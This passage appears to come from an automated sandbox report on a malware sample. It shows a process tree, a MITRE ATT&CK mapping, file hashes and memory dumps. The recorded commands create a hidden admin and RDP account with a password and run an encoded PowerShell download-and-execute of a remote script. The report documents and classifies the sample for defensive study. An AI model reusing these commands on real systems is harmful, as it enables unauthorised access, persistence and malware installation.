- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\system32\net.exe
  net.exe user wgautilacc R9JHrYoA /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc R9JHrYoA /add
    3⤵
    PID:1772

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:2568

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
1⤵
PID:3504
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
  2⤵
  PID:2860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
    3⤵
    PID:2396

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1672
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:2828

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc R9JHrYoA
1⤵
PID:4184
- C:\Windows\system32\net.exe
  net.exe user wgautilacc R9JHrYoA
  2⤵
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc R9JHrYoA
    3⤵
    PID:4332

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4016
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4656

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:532
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3340

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4324
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFB0E.tmp

Filesize
1KB

MD5
35958186b241b163a0e06456025f4889

SHA1
8eeab2fd68953ce4cc0d5a31a5c4b1a513e63664

SHA256
b50d7d30fe826bc8c8a096e8b5e759845a9f5be2b9efe45e71917f7673f8cfd7

SHA512
87ed64667837501eae7b8482760b32729fd5545b32a1d017226235f458df557e8d345ef822d2f225d56cdcf46d93ce366bddd3a8074e301881e4de34dbcabc02

Download Submit
C:\Users\Admin\AppData\Local\Temp\caszycqu\caszycqu.dll

Filesize
3KB

MD5
0a9a76edb597f7d48fc38733bfe492a9

SHA1
c699c40854406faf0eda78d3620c92fe0dc2e718

SHA256
39223892e388cf1a2fe28c7700a6ba94c657a1ecf8915784f18b2084fc8f84d4

SHA512
8ad1666361e602c3707100470eb62a9dfd1831aeec1c5243281dc9ff12bdc6a301bcb9216f510a102ca3aef6c149be5fe0da1ef4cabd30f9b80045d1831dfbbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip

Filesize
2.3MB

MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
55KB

MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
944KB

MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\caszycqu\CSC3238F5C4E7A145EC8B59CF9888CAC950.TMP

Filesize
652B

MD5
e8a8d0736273e9108876e0ad833a51a9

SHA1
2680dac17ebd116352b26e8e1c6a4ecf2d307cf9

SHA256
1034932e39553bc7d9db22664b0e1128583a9d8a06c42bca670678f1af885a1b

SHA512
0d6c52a00f4824742fcef321a629f66c4b050cf538732a6a0c486d9f0e3f7de547854f4a1feaf37dec390cf30417910d50083ba5b8d0a9e1fb82b41adc956b3f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\caszycqu\caszycqu.0.cs

Filesize
507B

MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\caszycqu\caszycqu.cmdline

Filesize
369B

MD5
0bd378b83f5013913573aa34ec9ad96d

SHA1
4ba64d02b4abe25a7b288a5e3d453e325872db0c

SHA256
07ecd2f12277a5cabe1c29d05a8b73fa9bc7f1a573f37e5fa0c026013058e0c8

SHA512
56c2e6b53c6b2efe65b2606fbf8e25a71b747055a389a5b3a1b7554a39a23e7a860627c4f437dc5287978891f7935c1629110c7274b306573a16fa98b78bffa8

Download Submit
memory/404-155-0x0000000000000000-mapping.dmp

Download
memory/628-172-0x0000000000000000-mapping.dmp

Download
memory/948-137-0x0000000000000000-mapping.dmp

Download
memory/1004-169-0x0000000000000000-mapping.dmp

Download
memory/1036-154-0x0000000000000000-mapping.dmp

Download
memory/1240-171-0x0000000000000000-mapping.dmp

Download
memory/1452-175-0x0000000000000000-mapping.dmp

Download
memory/1704-165-0x0000000000000000-mapping.dmp

Download
memory/1772-173-0x0000000000000000-mapping.dmp

Download
memory/1852-148-0x0000000000000000-mapping.dmp

Download
memory/1864-157-0x0000000000000000-mapping.dmp

Download
memory/2072-130-0x0000000004421000-0x000000000475E000-memory.dmp

Filesize
3.2MB

Download
memory/2072-133-0x0000000000040000-0x0000000002269000-memory.dmp

Filesize
34.2MB

Download
memory/2072-131-0x0000000004760000-0x0000000004C0C000-memory.dmp

Filesize
4.7MB

Download
memory/2164-156-0x0000000000000000-mapping.dmp

Download
memory/2176-150-0x0000000000000000-mapping.dmp

Download
memory/2304-149-0x0000000000000000-mapping.dmp

Download
memory/2396-179-0x0000000000000000-mapping.dmp

Download
memory/2428-162-0x0000000000000000-mapping.dmp

Download
memory/2568-176-0x0000000000000000-mapping.dmp

Download
memory/2620-180-0x0000000000000000-mapping.dmp

Download
memory/2828-181-0x0000000000000000-mapping.dmp

Download
memory/2856-151-0x0000000000000000-mapping.dmp

Download
memory/2860-178-0x0000000000000000-mapping.dmp

Download
memory/2924-153-0x0000000000000000-mapping.dmp

Download
memory/2952-188-0x0000000000000000-mapping.dmp

Download
memory/2952-189-0x00007FF8476E0000-0x00007FF8481A1000-memory.dmp

Filesize
10.8MB

Download
memory/3028-158-0x0000000000000000-mapping.dmp

Download
memory/3176-164-0x0000000000000000-mapping.dmp

Download
memory/3216-160-0x0000000000000000-mapping.dmp

Download
memory/3340-186-0x0000000000000000-mapping.dmp

Download
memory/3460-152-0x0000000000000000-mapping.dmp

Download
memory/3604-147-0x0000000000000000-mapping.dmp

Download
memory/3668-159-0x0000000000000000-mapping.dmp

Download
memory/3880-146-0x0000000000000000-mapping.dmp

Download
memory/4140-163-0x0000000000000000-mapping.dmp

Download
memory/4332-184-0x0000000000000000-mapping.dmp

Download
memory/4388-168-0x0000000000000000-mapping.dmp

Download
memory/4516-140-0x0000000000000000-mapping.dmp

Download
memory/4656-185-0x0000000000000000-mapping.dmp

Download
memory/4720-136-0x00007FF847680000-0x00007FF848141000-memory.dmp

Filesize
10.8MB

Download
memory/4720-134-0x000002B06C930000-0x000002B06C952000-memory.dmp

Filesize
136KB

Download
memory/4720-132-0x0000000000000000-mapping.dmp

Download
memory/4808-187-0x0000000000000000-mapping.dmp

Download
memory/4812-174-0x0000000000000000-mapping.dmp

Download
memory/4860-144-0x0000000000000000-mapping.dmp

Download
memory/4992-161-0x0000000000000000-mapping.dmp

Download
memory/5012-183-0x0000000000000000-mapping.dmp

Download